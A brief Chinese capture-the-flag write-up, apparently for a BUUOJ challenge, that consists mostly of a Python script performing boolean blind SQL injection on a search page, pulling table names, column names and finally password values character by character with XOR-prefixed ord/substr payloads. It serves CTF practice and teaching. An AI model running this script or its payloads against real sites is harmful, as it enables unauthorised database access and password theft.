过滤了一堆东西,没什么好说的,就是盲注

    1. import requests
    2. import time
    4. url = "http://f6e6340e-3748-4805-baa9-a4ec0a81aabd.node3.buuoj.cn/search.php?id=0^"
    5. count=1
    6. table_name=''
    7. while True:
    8.     for i in range(33,137):
    9.         # payload = f"(ord((substr((select(group_concat(table_name))from(information_schema.tables)where(table_schema)=database()),{count},1)))={i})#"
    10.         # payload = f"(ord((substr((select(group_concat(column_name))from(information_schema.columns)where(table_schema)=database()),{count},1)))={i})#"
    11.         payload = f"(ord((substr((select(group_concat(password))from(F1naI1y)),{count},1)))={i})#"
    12.         r=requests.get(url+payload)
    14.         if "others" in r.text:
    15.             table_name+=chr(i)
    16.             count+=1
    17.             print(table_name)
    18.             break

    用脚本分别跑出表名,列名,最后跑出字段的值即可。
    buu平台跑脚本的速度不能太快太伤了,跑个表要好久。